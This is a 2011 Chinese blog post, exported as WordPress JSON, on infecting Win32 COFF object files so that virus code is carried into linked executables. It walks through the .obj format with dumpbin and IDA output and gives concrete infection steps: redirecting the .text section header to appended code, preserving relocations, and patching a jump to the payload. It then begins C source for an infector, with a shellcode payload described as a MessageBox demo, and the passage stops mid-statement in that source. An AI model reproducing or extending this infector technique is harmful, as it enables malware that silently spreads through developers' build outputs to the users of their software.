﻿{"id":404,"date":"2011-01-15T10:41:51","date_gmt":"2011-01-15T10:41:51","guid":{"rendered":""},"modified":"2011-11-18T17:11:58","modified_gmt":"2011-11-18T09:11:58","slug":"404","status":"publish","type":"post","link":"http:\/\/zerobox.org\/notes\/404.html","title":{"rendered":"Win32 coff-obj\u6587\u4ef6\u611f\u67d3\u6280\u672f\u7814\u7a76"},"content":{"rendered":"<h4>Win32 coff-obj\u6587\u4ef6\u611f\u67d3\u6280\u672f\u7814\u7a76<\/h4>\n<pre style=\"width: 100%; word-wrap: break-word;\">By nEINEI \r\n\r\n[\u76ee\u5f55]\r\n\r\n[0x01] .\u7b80\u4ecb\r\n[0x02] .\u611f\u67d3\u601d\u8def\r\n[0x03] .coff-obj\u683c\u5f0f\r\n[0x04] .\u4fee\u6539\u5bbf\u4e3b\u6570\u636e\r\n[0x05] .code\r\n[0x06] .\u5176\u5b83\r\n\r\n[0x01] .\u7b80\u4ecb\r\n\r\n    \u672c\u6587\u4ecb\u7ecd\u4e86\u5982\u4f55\u611f\u67d3win32\u5e73\u53f0\u7684coff-obj\u683c\u5f0f\u7684\u6587\u4ef6\u3002\u5728\u6ca1\u6709rebuild all\u60c5\u51b5\u4e0b\uff0c\u88ab\r\n\u611f\u67d3coff-obj\u6587\u4ef6\u5c06\u88ab\u94fe\u63a5\u5668\u4ece\u65b0\u5408\u5e76\u5230\u65b0\u6587\u4ef6\u5f53\u4e2d\uff0c\u75c5\u6bd2\u4ee3\u7801\u4e5f\u5c31\u5c06\u5bc4\u5bbf\u4e8e\u4ea7\u751f\u7684EXE\u6587\r\n\u4ef6\u4e2d\u3002\r\n\r\n[0x02] .\u611f\u67d3\u601d\u8def\r\n\r\n    \u53ef\u611f\u67d3obj\u6587\u4ef6\u7684\u75c5\u6bd2\u975e\u5e38\u5c11\uff0c\u4e3b\u8981\u96c6\u4e2d\u5728\u611f\u67d3DOS\u65f6\u671f\u7684com\u6587\u4ef6\uff0c\u6700\u65e9\u7684\u611f\u67d3obj\u6587\u4ef6\r\n\u7684\u75c5\u6bd2\u662fStormbringer\u57281993\u5e74\u7f16\u5199\u7684shifter\u3002charme\u7684blog\u4e0a\u6709\u5173\u4e8e\u8fd9\u4e2a\u7684\u8be6\u7ec6\u5206\u6790\r\n\u300a\u611f\u67d3OBJ\u6587\u4ef6\u300b\u3002\u5728win32\u5e73\u53f0\u4e0b\u8c8c\u4f3c\u8fd8\u6ca1\u770b\u5230\u6709\u611f\u67d3coff-obj\u683c\u5f0f\u7684\u75c5\u6bd2\uff0c\u4e0b\u9762\u5c06\u6f14\u793a\u5982\r\n\u4f55\u53bb\u611f\u67d3coff-obj\u6587\u4ef6\u7684\u5b9e\u73b0\u601d\u8def\u3002\r\n\r\n    
\u4e3b\u8981\u7684\u60f3\u6cd5\uff0c\u8fd8\u662f\u8981\u83b7\u5f97coff-obj\u6587\u4ef6\u4e2d\u4ee3\u7801\u6267\u884c\u7684\u63a7\u5236\u6d41\u7a0b\uff0c\u4f46\u53d7coff-obj\u683c\u5f0f\u9650\u5236\uff0c\r\n\u4f7f\u5f97\u611f\u67d3\u65b9\u5f0f\u4e0d\u53ef\u80fd\u50cfPE\u6587\u4ef6\u90a3\u6837\u7075\u6d3b\u3002\u4f46\u4ecd\u7136\u53ef\u4ee5\u7528\u5f88\u591a\u601d\u8def\u6765\u7a81\u7834\u611f\u67d3\u8fd9\u4e9b\u74f6\u9888\u3002\r\n\r\n    PE\u6587\u4ef6\u7684\u4e3b\u8981\u611f\u67d3\u601d\u8def                        coff-obj\r\n\r\n    1 \u611f\u67d3\u6587\u4ef6\u5934                                \u5934\u90e8\u65e0\u53ef\u64cd\u4f5c\u7a7a\u95f4\r\n    2 \u4fee\u6539EOP                                   \u6ca1\u6709EOP\u7684\u6982\u5ff5\r\n    3 \u6dfb\u52a0\u65b0\u8282                                  \u53ef\u4ee5\u5c1d\u8bd5\r\n    4 EPO\uff08\u5165\u53e3\u6a21\u7cca\uff09                          \u53ef\u4ee5\u5c1d\u8bd5\r\n    5 hook \u5bfc\u5165\u8868                               \u53ef\u4ee5\u5c1d\u8bd5\r\n    6 PE\u6346\u7ed1                                    \u94fe\u63a5\u5668\u6267\u884c\u4f1a\u51fa\u95ee\u9898\r\n    7 ...                                       
...\r\n\r\n    \u8fd9\u91cc\u91c7\u7528\u6bd4\u8f83\u7a33\u59a5\u7684\u65b9\u5f0f\u6765\u83b7\u5f97\u63a7\u5236\u6d41\u7a0b\uff0c\u5c31\u662f\u91cd\u65b0\u6784\u9020\u4e00\u4e2acoff-obj\u683c\u5f0f\u7684.text\u6bb5\u6765\r\n\u83b7\u5f97\u63a7\u5236\u6d41\u7a0b\uff0c\u4e0b\u9762\u5148\u770b\u4e00\u4e0bcoff-obj\u7684\u6587\u4ef6\u683c\u5f0f\u3002\r\n\r\n[0x03] .coff-obj\u683c\u5f0f\r\n\r\n    coff-obj \u6587\u4ef6\u683c\u5f0f\u6bd4\u8f83\u6e05\u6670\uff0c\u7531\u6587\u4ef6\u5934+\u53ef\u9009\u5934+\u6bb5+\u6570\u636e+\u91cd\u5b9a\u4f4d+\u7b26\u53f7\u7ec4\u6210\u3002\u5bf9obj\u6587\r\n\u4ef6\u6765\u8bf4\u662f\u6ca1\u6709\u53ef\u9009\u5934\u7684\u6982\u5ff5\u7684\uff0c\u6240\u4ee5\u540e\u9762\u63d0\u5230\u7684coff-obj\u4e13\u6307\u751f\u6210\u7684\u76ee\u6807\u6587\u4ef6\u683c\u5f0f\uff0c\u7b80\u79f0obj\uff0c\r\n\u4e0b\u9762\u662f\u8981\u6784\u9020\u4e00\u4e2a\u65b0\u7684.text\u6bb5\u7684\u793a\u610f\u56fe\uff0c\u5b9e\u9645\u6bb5\u7684\u6392\u5217\u548c\u91cd\u5b9a\u4f4d\u7684\u6570\u636e\u662f\u6df7\u5408\u7684\uff0c\u6b64\u5904\u4ec5\u662f\r\n\u4e3a\u4e86\u65b9\u4fbf\u63cf\u8ff0\uff0c\u7b80\u5316\u5904\u7406\u4e86\u3002\r\n\r\n\t   +--------------+\r\n\t   | FILEHDR      |\r\n\t   +--------------+\r\n\t   | SECHDR1      | -----------\u5047\u8bbe\u6b64\u5904\u662f\u539f.text\u6bb5\uff0c\u4fee\u6539\u8282\u6570\u636e\u4f7f\u5b83\u6307\u5411\u65b0\u7684\u6dfb\u52a0\u6570\u636e\r\n\t   +--------------+            |\r\n\t   | SECHDR2      |            |\r\n\t   +--------------+            |\r\n\t   | ...          
|            |\r\n\t   +--------------+            |\r\n\t   |  SECHDR N    |            |\r\n\t   +--------------+            |\r\n\t   |  SECDATE     |            |\r\n\t   +--------------+            |\r\n\t   |  LINE        |            |\r\n\t   +--------------+            |\r\n\t   |  Symbol      |            |\r\n\t   +--------------+            |\r\n\t   |  String      |            |\r\n\t   +--------------+            |\r\n\t   | new data     | &lt;----------.\r\n\t   +--------------+ \r\n\r\n    \u4e0b\u9762\u4f7f\u7528\u4e00\u4e2a\u7b80\u5355\u7684c\u7a0b\u5e8ft_obj\u6765\u8be6\u7ec6\u8bf4\u660eobj\u683c\u5f0f\u3002\r\n\r\n\/\/----------------------------------------------------------------------\r\n\t\t\t#include &lt;stdio.h&gt;\r\n\t\t\tint main()\r\n\t\t\t{\r\n\t\t\t\tchar *title = \"hello world!\";\r\n\t\t\t\tprintf(title);\r\n\t\t\t}\r\n\/\/----------------------------------------------------------------------\t\t\t\r\n\r\n\t   cmd &gt; dumpbin \/all \/disasm t_obj.obj\r\n\r\n    \u622a\u53d6\u4e3b\u8981\u90e8\u5206\u6253\u5370\u6570\u636e\uff1a\r\n\r\n\/\/-------------------------------- \u6587\u4ef6\u5934 -------------------------------\r\nFILE HEADER VALUES\r\n\t   14C machine (i386)\r\n\t     4 number of sections *** \u91cd\u8981\u7684\u7ed3\u6784\uff0c\u8fd9\u544a\u8bc9\u6211\u4eec\u8fd9\u4e2aobj\u6587\u4ef6\u6709\u51e0\u4e2a\u6bb5\uff0c\u800c\u6211\u4eec\u5173\u5fc3\u7684\u5c31\u662f.text\u6bb5\r\n\t4C6DF71D time date stamp\r\n\t   125 file pointer to symbol table\r\n\t    10 number of symbols\r\n\t     0 size of optional header\r\n\t     0 characteristics\r\n\r\n\/\/-------------------------------- .drectve\u6bb5 -----------------------------\r\n\/\/----\u8be5\u6bb5\u5728obj\u6587\u4ef6\u88ablink\u8fc7\u7a0b\u4e2d\u4f1a\u88ab\u820d\u5f03\u6389\uff0c\u4e3b\u8981\u63d0\u4f9b\u7ed9link\u7684\u547d\u4ee4\u53c2\u6570-------\r\n\r\nSECTION HEADER #1\r\n.drectve name\r\n       0 physical address\r\n       0 virtual address\r\n      26 size of raw 
data\r\n      B4 file pointer to raw data\r\n       0 file pointer to relocation table\r\n       0 file pointer to line numbers\r\n       0 number of relocations\r\n       0 number of line numbers\r\n  100A00 flags\r\n         Info\r\n         Remove\r\n         1 byte align\r\n\r\nRAW DATA #1\r\n  00000000: 2D 64 65 66 61 75 6C 74 6C 69 62 3A 4C 49 42 43  -defaultlib:LIBC\r\n  00000010: 20 2D 64 65 66 61 75 6C 74 6C 69 62 3A 4F 4C 44  -defaultlib:OLD\r\n  00000020: 4E 41 4D 45 53 20                                NAMES \r\n\r\n   Linker Directives\r\n   -----------------\r\n   -defaultlib:LIBC\r\n   -defaultlib:OLDNAMES\r\n\r\n\/\/-------------------------------- .text\u6bb5 -----------------------------\r\n\r\nSECTION HEADER #2\r\n\t .text name\r\n\t     0 physical address\r\n\t     0 virtual address\r\n\t    10 size of raw data                   -----&gt; \u6bb5\u957f\u5ea6\uff0c\u4e5f\u5c31\u662f\u5b9e\u9645\u7f16\u7801\u957f\u5ea6\r\n\t    DA file pointer to raw data           -----&gt; .text\u4e2d\u4ee3\u7801\uff0c\u76f8\u5bf9\u6587\u4ef6\u5934\u90e8\u7684\u504f\u79fb\r\n\t    EA file pointer to relocation table   -----&gt; \u6307\u5411.text\u4e2d\u9700\u8981\u91cd\u5b9a\u4f4d\u7684\u6570\u636e\u6307\u9488\r\n\t     0 file pointer to line numbers\r\n\t     2 number of relocations              -----&gt; .text\u4e2d\u4ee3\u7801\uff0c\u9700\u8981\u88ab\u4fee\u6b63\u7684\u91cd\u5b9a\u4f4d\u6570\u91cf\r\n\t     0 number of line numbers\r\n\t60501020 flags\r\n\t       Code\r\n\t       Communal; sym= _main\r\n\t       16 byte align\r\n\t       Execute Read\r\n\r\n_main:\r\n  00000000: 68 00 00 00 00     push    offset _main   ----&gt;\u6b64\u5904\u504f\u79fb\u662f0x00000000\uff0c\u8fd8\u6ca1\u6709\u88ab\u91cd\u5b9a\u4f4d\r\n  00000005: E8 00 00 00 00     call    0000000A       ----&gt;\u6b64\u5904\u504f\u79fb\u662f0x00000000\uff0c\u8fd8\u6ca1\u6709\u88ab\u91cd\u5b9a\u4f4d\r\n  0000000A: 59                 pop     ecx\r\n  0000000B: C3                 ret\r\n  
0000000C: 90                 nop\r\n  0000000D: 90                 nop\r\n  0000000E: 90                 nop\r\n  0000000F: 90                 nop\r\n\r\nRAW DATA #2\r\n  00000000: 68 00 00 00 00 E8 00 00 00 00 59 C3 90 90 90 90  h.........Y.....\r\n\r\n    \u5177\u4f530x68\uff0c0xe8\u540e\u9762\u7684\u503c\u9700\u8981\u7531\u7f16\u8bd1\u5668\u6765\u7edd\u5bf9\u3002\r\n\r\n\/\/--------------------- .text\u6bb5\u4e2d\u7684\u88ab\u4fee\u6b63\u7684\u91cd\u5b9a\u4f4d\u8868 --------------------\r\n\/\/\u6700\u7ec8\u4ee3\u7801\u5c31\u662f\u6839\u636e\u8be5\u8868\u4e2d\u7684\u503c\u7ed9\u94fe\u63a5\u5668\u63d0\u4f9b\u4fe1\u606f\u505a\u6700\u540e\u7684\u91cd\u5b9a\u4f4d\u4f9d\u636e\r\n\r\nRELOCATIONS #2\r\n                                                Symbol    Symbol\r\n Offset    Type              Applied To         Index     Name\r\n --------  ----------------  -----------------  --------  ------\r\n 00000001  DIR32                      00000000         D  ??_C@_0N@NHHG@hello?5world?$CB?$AA@ (`string\")\r\n 00000006  REL32                      00000000         A  _printf\r\n\r\n    \u8fd9\u91cc\u8bf4\u4e00\u4e0b\uff0c\u91cd\u5b9a\u4f4d\u7684\u7c7b\u578b\u67093\u7c7b\uff1a\r\n\r\nDIR32    ---&gt; \u76f4\u63a5\u91cd\u5b9a\u4f4d\uff0c\u591a\u662f\u5b57\u7b26\u4e32\u4e00\u7c7b\u60c5\u51b5\uff0c\u9700\u8981\u6709\u94fe\u63a5\u5668\u6700\u7ec8\u5b9a\u4f4d\u5177\u4f53\u7684\u865a\u62df\u5730\u5740\u503c\r\nREL32    ---&gt; \u76f8\u5bf9\u91cd\u5b9a\u4f4d\uff0c\u5f53\u524dopcode\uff0c\u76f8\u5bf9\u4e8e\u8981\u8df3\u8f6c\u7684\u51fd\u6570\u7684\u76f8\u5bf9\u504f\u79fb\u503c\r\nDIR32NB  ---&gt; \u4f9b\u8c03\u8bd5\u4fe1\u606f\u4f7f\u7528\uff0c\u4e0eDIR32\u7684\u533a\u522b\u662f\u91cd\u5b9a\u4f4d\u503c\u4e0d\u5305\u542b\u53ef\u6267\u884c\u6587\u4ef6\u7684\u9ed8\u8ba4\u52a0\u8f7d\u5730\u5740\r\n\r\n    
00000001\uff0c00000006\u8868\u793a\u76f8\u5bf9.text\u4ee3\u7801\u5904\u8981\u4fee\u6b63\u7684\u4f4d\u7f6e\u504f\u79fb\uff0c\u4e5f\u5c31\u662f[]\u62ec\u8d77\u6765\u7684\u90e8\u5206\r\n\r\n00000000: 68 [00] 00 00 00     push        offset _main\r\n00000005: E8 [00] 00 00 00     call        0000000A     \r\n\r\n\/\/-------------------------------- .data\u6bb5 -----------------------------\r\n\r\nSECTION HEADER #3\r\n   .data name\r\n       0 physical address\r\n       0 virtual address\r\n       D size of raw data\r\n      FE file pointer to raw data\r\n       0 file pointer to relocation table\r\n       0 file pointer to line numbers\r\n       0 number of relocations\r\n       0 number of line numbers\r\nC0301040 flags\r\n         Initialized Data\r\n         Communal; sym= \"`string\"\" (??_C@_0N@NHHG@hello?5world?$CB?$AA@)\r\n         4 byte align\r\n         Read Write\r\n\r\nRAW DATA #3\r\n  00000000: 68 65 6C 6C 6F 20 77 6F 72 6C 64 21 00           hello world!. \r\n\r\n    \u6570\u636e\u7684\u4f4d\u7f6e\u6700\u540e\u7531\u94fe\u63a5\u5668\u6765\u5b9a\u4e49\u3002\r\n\r\n\/\/------------------------------------------------------------------------------\t\r\n\r\n    \u4e0b\u9762\u770b\u4e00\u4e0bt_obj.obj\u5728IDA\u4e2d\u7684\u663e\u793a\u60c5\u51b5:\r\n\r\n\t\t.text:00000000                  public _main\r\n\t\t.text:00000000                  _main           proc near\r\n\t\t.text:00000000 68 10 00 00 00   push    offset ??_C@_0N@NHHG@hello?5world?$CB?$AA@ ; \"hello world!\"\r\n\t\t.text:00000005 E8 16 00 00 00   call    _printf\r\n\t\t.text:0000000A 59               pop     ecx\r\n\t\t.text:0000000B C3               retn\r\n\t\t.text:0000000B                  _main           endp\r\n\r\n    IDA\u6839\u636e\u91cd\u5b9a\u4f4d\u8868\u7684\u683c\u5f0f\uff0c\u5bf9.text\u6bb5\u5206\u522b\u4fee\u6b63\u4e3a0x10 \uff0c0x16 \u4e24\u4e2a\u504f\u79fb\u3002\u540c\u65f6\u5f53\u4f60\u589e\u52a0\r\n.text 
code\u5927\u5c0f\u65f6\uff0c\u94fe\u63a5\u5668\u4f1a\u81ea\u52a8\u8c03\u6574.data\u7684\u4f4d\u7f6e\u3002\r\n\r\n\/\/------------------------------------------------------------------------------\t\r\n\r\n    \u6700\u7ec8\u751f\u6210\u7684t_obj.EXE\u6587\u4ef6\u663e\u793a\u60c5\u51b5\r\n\r\n\t\t00401000   \/$  68 30704000      push t_obj.00407030  ;  ASCII \"hello world!\"\r\n\t\t00401005   |.  E8 06000000      call t_obj.00401010\r\n\t\t0040100A   |.  59               pop ecx\r\n\t\t0040100B   .  C3               retn\r\n\r\n    \u5b57\u7b26\u4e32\"hello world!\" \u88ab\u5b9a\u4f4d\u5230\u4e860x00407030\r\n    printf \u51fd\u6570\u88ab\u5b9a\u4f4d\u5230\u76f8\u5bf9\u504f\u79fb0x05 + 0x6 = 0x0b \u7684\u4f4d\u7f6e\uff0c\u4e5f\u5373\u662f\u865a\u62df\u5730\u5740\u4e3a401010\r\n\r\n    \u6b64\u65f6\u6211\u4eec\u77e5\u9053\uff0c\u5982\u679c\u8981\u4fee\u6539obj\u6587\u4ef6\u7684.text\u4ee3\u7801\u662f\u8981\u6ce8\u610f\u7684\uff0c\u8981\u907f\u514d\u4fee\u6539\u5230\u91cd\u5b9a\u4f4d\u7684\u90e8\r\n\u5206\uff0c\u5426\u5219\u4f60\u7684\u4ee3\u7801\u4e5f\u4f1a\u88ab\u94fe\u63a5\u5668\u6539\u5199\u3002\r\n\r\n[0x04] .\u4fee\u6539\u5bbf\u4e3b\u6570\u636e\r\n\r\n    1. 
\u4fee\u6539.text\u7ed3\u6784\u4f7f\u5176\u6307\u5411\u65b0\u52a0\u5165\u7684\u75c5\u6bd2\u4ee3\u7801\u4f4d\u7f6e\uff0c\u4e0b\u9762\u662f\u6bb5\u7684\u7ed3\u6784\u4f53\u7c7b\u578b\uff1a\r\n\r\n\t\ttypedef struct _sec_hdr\r\n\t\t{\r\n\t\t\tchar c_name[8];              \/\/ \u6bb5\u540d\r\n\t\t\tunsigned long  ul_v_size;    \/\/ \u865a\u62df\u5927\u5c0f\r\n\t\t\tunsigned long  ul_v_addr;    \/\/ \u865a\u62df\u5730\u5740\r\n\t\t\tunsigned long  ul_sec_size;  \/\/ \u6bb5\u957f\u5ea6\r\n\t\t\tunsigned long  ul_sec_off;   \/\/ \u6bb5\u6570\u636e\u504f\u79fb\r\n\t\t\tunsigned long  ul_rel_off;   \/\/ \u6bb5\u91cd\u5b9a\u4f4d\u8868\u504f\u79fb\r\n\t\t\tunsigned long  ul_lno_off;   \/\/ \u884c\u53f7\u8868\u504f\u79fb\r\n\t\t\tunsigned short ul_num_rel;   \/\/ \u91cd\u5b9a\u4f4d\u8868\u4e2a\u6570\r\n\t\t\tunsigned short ul_num_ln;    \/\/ \u884c\u53f7\u8868\u957f\u5ea6\r\n\t\t\tunsigned long  ul_flags;     \/\/ \u6bb5\u6807\u8bc6\r\n\t\t}sec_hdr;\r\n\r\n    ul_sec_size --&gt; \u4fee\u6539\u4e3a\u539f\u4ee3\u7801\u7684\u957f\u5ea6+\u75c5\u6bd2\u4ee3\u7801\u957f\u5ea6+\u91cd\u5b9a\u4f4d\u8868\u957f\u5ea6\r\n    ul_sec_off  --&gt; \u6307\u5411\u6587\u4ef6\u672b\u5c3e\r\n\r\n    2. 
\u5728\u5206\u6790\u4e2d\u53d1\u73b0\u4e00\u4e2a\u95ee\u9898\uff0c\u5982\u679c\u628a\u539f.text\u7684\u4ee3\u7801\u62f7\u8d1d\u5230\u65b0\u7684\u7a7a\u95f4\u4e2d\u800c\u4e0d\u62f7\u8d1d\u91cd\u5b9a\u4f4d\u6570\r\n\u636e\uff0c\u4f1a\u5bfc\u81f4\u94fe\u63a5\u5668\u65e0\u6cd5\u6267\u884c\u3002\u751f\u6210\u7684EXE\u6587\u4ef6\u4e5f\u65e0\u6cd5\u6267\u884c\uff0c\u56e0\u4e3a\u90a3\u90e8\u5206\u6570\u636e\u88ab\u75c5\u6bd2\u4ee3\u7801\u586b\u5145\uff0c\r\n\u94fe\u63a5\u5668\u65e0\u6cd5\u89e3\u6790\u3002\r\n\r\n    \u867d\u7136.text \u7684\u4ee3\u7801\u90e8\u5206\u957f\u5ea6\u5e76\u4e0d\u5305\u62ec\u91cd\u5b9a\u4f4d\u90e8\u5206\u957f\u5ea6\uff0c\u4e14\u5305\u62ec\u6307\u5411\u6bb5\u5185\u91cd\u5b9a\u4f4d\u8868\u504f\u79fb\u7684\r\n\u6307\u9488\uff0c\u94fe\u63a5\u5668\u53ef\u4ee5\u6839\u636e\u539f\u6709\u90a3\u4e2a\u8868\u8fdb\u884c\u91cd\u5b9a\u4f4d\u64cd\u4f5c\uff0c\u4f46\u5b9e\u9645\u60c5\u51b5\u662f\uff0c\u94fe\u63a5\u5668\u4f1a\u56e0\u4e3a\u4f60\u7684\u4fee\u6539\uff0c\r\n\u628a\u539f\u6709\u6570\u636e\u91cd\u5b9a\u4f4d\u5f04\u9519\u8bef\uff0c\u5728IDA\u4e2d\u89c2\u5bdf\u662f\u6ca1\u6709\u95ee\u9898\u7684\uff0c\u4f46\u6700\u7ec8\u751f\u6210\u7684EXE\u6587\u4ef6\u662f\u5b8c\u5168\u6df7\u4e71\u7684\u3002\r\n\r\n    \u6240\u4ee5\u6211\u7684\u4e00\u4e2a\u731c\u6d4b\u662f\u6bb5\u7ed3\u6784\u4e2d\u7684\u91cd\u5b9a\u4f4d\u504f\u79fb\u4ec5\u662f\u63d0\u4f9b\u7ed9\u5916\u90e8\u7a0b\u5e8f\u89e3\u6790\u53c2\u8003\u7528\u7684\uff08\u5982IDA\uff0c\r\ndumpbin\uff09\uff0c\u800c\u94fe\u63a5\u5668\u53ea\u63a5\u53d7\u9ed8\u8ba4.text\u540e\u9762\u5c31\u662f\u91cd\u5b9a\u4f4d\u8868\u7684\u4e8b\u5b9e\u3002\u6240\u4ee5\u4e3a\u4e86\u80fd\u6267\u884c\u6210\u529f\uff0c\u6211\r\n\u4eec\u8fd8\u662f\u628a\u91cd\u5b9a\u4f4d\u90e8\u5206\u62f7\u8d1d\u8fc7\u53bb\uff0c\u6240\u4ee5\u6211\u4eec\u65b0\u589e\u6570\u636e\u7684\u957f\u5ea6\u662f\u4ee5\u4e0a3\u90e8\u5206\u7684\u957f\u5ea6\u603b\u548c\u3002\r\n\r\n    3. 
\u4fee\u6539\u539f\u6709\u4ee3\u7801\uff0c\u4f7f\u5176\u8df3\u5411\u75c5\u6bd2\u4ee3\u7801\u3002\r\n\r\n  _main:\r\n  00000000: 68 00 00 00 00     push        offset _main\r\n  00000005: E8 00 00 00 00     call        0000000A\r\n  0000000A: 59                 pop         ecx\r\n  0000000B: C3                 ret ----------------\r\n  0000000C: 90                 nop                 |\r\n  0000000D: 90                 nop                 |\r\n  0000000E: 90                 nop                 |\r\n  0000000F: 90                 nop                 |\r\n  ... \u6ce8\u610f\u6b64\u5904\u662f\u91cd\u5b9a\u4f4d\u8868\u7684\u6570\u636e\uff0c\u8981\u8df3\u8fc7\u8be5\u90e8\u5206\u957f\u5ea6   |                                                |\r\n                                                   |\r\n  000000xx: nop &lt;----------------------------------\/\r\n  000000xx: nop\r\n  000000xx: nop\r\n  ...virus code \r\n\r\n    4. \u8fd4\u56de\u539f\u4ee3\u7801\u90e8\u5206\r\n\r\n    \u7b80\u5355\u7684\u60c5\u51b5\uff0c\u53ef\u76f4\u63a5\u5728\u75c5\u6bd2\u4ee3\u7801\u4e2dret\u8fd4\u56de\u5373\u53ef\uff0c\u5bbf\u4e3b\u60c5\u51b5\u590d\u6742\u7684\u8bdd\uff0c\u9700\u8981\u8ba1\u7b97\u597d\u504f\u79fb\r\n\u91cd\u65b0\u8df3\u56de\u53bb\u3002\r\n\r\n    5. 
\u611f\u67d3\u540e\u7684\u60c5\u51b5\r\n\r\n  SECTION HEADER #2\r\n   .text name\r\n       0 physical address\r\n       0 virtual address\r\n      D9 size of raw data                     ----&gt; \u957f\u5ea6\u5df2\u7ecf\u88ab\u91cd\u65b0\u8ba1\u7b97\r\n     26D file pointer to raw data             ----&gt; \u6307\u5411\u4e86\u6587\u4ef6\u672b\u5c3e\r\n      EA file pointer to relocation table     ----&gt; \u6ca1\u6709\u4fee\u6539\u539f\u6709\u91cd\u5b9a\u4f4d\u8868\r\n       0 file pointer to line numbers\r\n       2 number of relocations\r\n       0 number of line numbers\r\n60501020 flags\r\n         Code\r\n         Communal; sym= _main\r\n         16 byte align\r\n         Execute Read\r\n\r\n_main:\r\n  00000000: 68 00 00 00 00     push        offset _main\r\n  00000005: E8 00 00 00 00     call        0000000A\r\n  0000000A: 59                 pop         ecx\r\n  0000000B: EB 1C              jmp         00000029  -------------------\r\n  0000000D: 00 00              add         byte ptr [eax],al            |\r\n  0000000F: 00 01              add         byte ptr [ecx],al            |\r\n  00000011: 00 00              add         byte ptr [eax],al            |\r\n  00000013: 00 0D 00 00 00 06  add         byte ptr ds:[6000000h],cl    |\r\n  00000019: 00 06              add         byte ptr [esi],al            |\r\n  0000001B: 00 00              add         byte ptr [eax],al            |\r\n  0000001D: 00 0A              add         byte ptr [edx],cl            |\r\n  0000001F: 00 00              add         byte ptr [eax],al            |\r\n  00000021: 00 14 00           add         byte ptr [eax+eax],dl        |\r\n  00000024: 68 65 6C 6C 90     push        906C6C65h                    |\r\n  00000029: 90                 nop   &lt;----------------------------------\/    \u8df3\u5411\u4e86\u6211\u4eec\u60f3\u8981\u6267\u884c\u7684\u4ee3\u7801\r\n  0000002A: 90                 nop\r\n  0000002B: 90                 nop\r\n  0000002C: 90                 nop\r\n  
0000002D: 90                 nop\r\n  0000002E: 90                 nop\r\n  0000002F: 90                 nop\r\n  00000030: 90                 nop\r\n  00000031: FC                 cld\r\n  00000032: 68 6A 0A 38 1E     push        1E380A6Ah\r\n  00000037: 68 63 89 D1 4F     push        4FD18963h\r\n  0000003C: 68 32 74 91 0C     push        0C917432h\r\n  00000041: 8B F4              mov         esi,esp\r\n  00000043: 8D 7E F4           lea         edi,[esi-0Ch]\r\n  ...\r\n\r\n[0x05] .code\r\n\r\n    \u4ee3\u7801\u6f14\u793a\u7684\u90e8\u5206\u4ec5\u5f39\u51fa\u4e00\u4e2aMessageBox\uff0c\u6211\u6bd4\u8f83\u61d2\uff0c\u6240\u4ee5\u5077\u61d2\u7528failwest\u7684\u4e00\u4e2ashellcode_popup_general\r\n\u4ee3\u7801\uff08thx ^_^\uff09\u7a0d\u4f5c\u4fee\u6539\u3002 \r\n\r\n\/\/------------------------------------------------------------------------------\r\n#include &lt;stdio.h&gt;\r\n#include &lt;string.h&gt;\r\n#include &lt;malloc.h&gt;\r\nvoid vir_code(void);\r\nvoid vir_code_end(void);\r\nint main(int argc, char* argv[])\r\n{\r\n\tFILE            *h = 0;\r\n\tunsigned char *buf = 0;\r\n\tint        numread = 0;\r\n\tint              i = 0;\r\n\tint         f_size = 0;\r\n\tint       vir_size = 0;\r\n\tint         a_size = 0;\r\n\tint        tx_off = 0;\r\n\r\n\t\/\/ coff-obj \u6587\u4ef6\u5934\u7ed3\u6784\r\n\ttypedef struct _coff_obj_header\r\n\t{\r\n\t\tshort int magic;\r\n\t\tshort int sections;\r\n\t\tlong      t_stamp;\r\n\t\tlong      symbol_to_pointer;\r\n\t\tlong      symbol_to_number;\r\n\t\tshort int optional_header;\r\n\t\tshort int flgs;\r\n\t}coff_obj_header;\r\n\r\n\ttypedef struct _sec_hdr\r\n\t{\r\n\t\tchar c_name[8];              \/\/ \u6bb5\u540d\r\n\t\tunsigned long  ul_v_size;    \/\/ \u865a\u62df\u5927\u5c0f\r\n\t\tunsigned long  ul_v_addr;    \/\/ \u865a\u62df\u5730\u5740\r\n\t\tunsigned long  ul_sec_size;  \/\/ \u6bb5\u957f\u5ea6\r\n\t\tunsigned long  ul_sec_off;   \/\/ \u6bb5\u6570\u636e\u504f\u79fb\r\n\t\tunsigned long  ul_rel_off;   \/\/ 
\u6bb5\u91cd\u5b9a\u4f4d\u8868\u504f\u79fb\r\n\t\tunsigned long  ul_lno_off;   \/\/ \u884c\u53f7\u8868\u504f\u79fb\r\n\t\tunsigned short ul_num_rel;   \/\/ \u91cd\u5b9a\u4f4d\u8868\u4e2a\u6570\r\n\t\tunsigned short ul_num_ln;    \/\/ \u884c\u53f7\u8868\u957f\u5ea6\r\n\t\tunsigned long  ul_flags;     \/\/ \u6bb5\u6807\u8bc6\r\n\t}sec_hdr;\r\n\r\n\ttypedef struct _reloc_s\r\n\t{\r\n\t\tunsigned long  ul_off;        \/\/ \u5b9a\u4f4d\u504f\u79fb\r\n\t\tunsigned long  ul_symbol;     \/\/ \u7b26\u53f7\r\n\t\tunsigned short us_type;       \/\/ \u5b9a\u4f4d\u7c7b\u578b\r\n\t}reloc_s;\r\n\r\n\tcoff_obj_header coh_buf;\r\n\tsec_hdr              sh;\r\n\r\n\tlong            tx_rel_off;\r\n\tlong            tx_rel_len;\r\n\tlong            txt_len;\r\n\tlong            txt_off;\r\n\r\n\tif (argc &lt;2)\r\n\t{\r\n\t\tprintf(\"please enter the obj file path to infection\r\n\");\r\n\t\treturn 0;\r\n\t}\r\n\r\n\tif (0 == (h = fopen(argv[1],\"r+\")))\r\n\t{\r\n\t\tprintf(\"the file %s was not opened\r\n\",argv[2]);\r\n\t\treturn 0;\r\n\t}\r\n\r\n\tfseek(h,0,SEEK_END);\r\n\tf_size = ftell(h);\r\n\tfseek(h,0,SEEK_SET);\r\n\r\n\tnumread  = fread(&amp;coh_buf,sizeof (coff_obj_header),1,h);\r\n\r\n\tfor(i = 0 ; i &lt; coh_buf.sections;i++)\r\n\t{\r\n\t\tfread(&amp;sh,sizeof(sec_hdr),1,h);\r\n\r\n\t\tif (0 == strnicmp(\".text\",sh.c_name,5))\r\n\t\t{\r\n\t\t\ttx_off  = sizeof(coff_obj_header) + i * sizeof(sec_hdr);\r\n\t\t\ttxt_off = sh.ul_sec_off;\r\n\t\t\ttxt_len = sh.ul_sec_size;\r\n\r\n\t\t\t\/\/\u8bfb\u53d6\u91cd\u5b9a\u4f4d\u8868\u6570\u636e\r\n\t\t\ttx_rel_off = sh.ul_rel_off;\r\n\t\t\ttx_rel_len = sh.ul_num_rel * 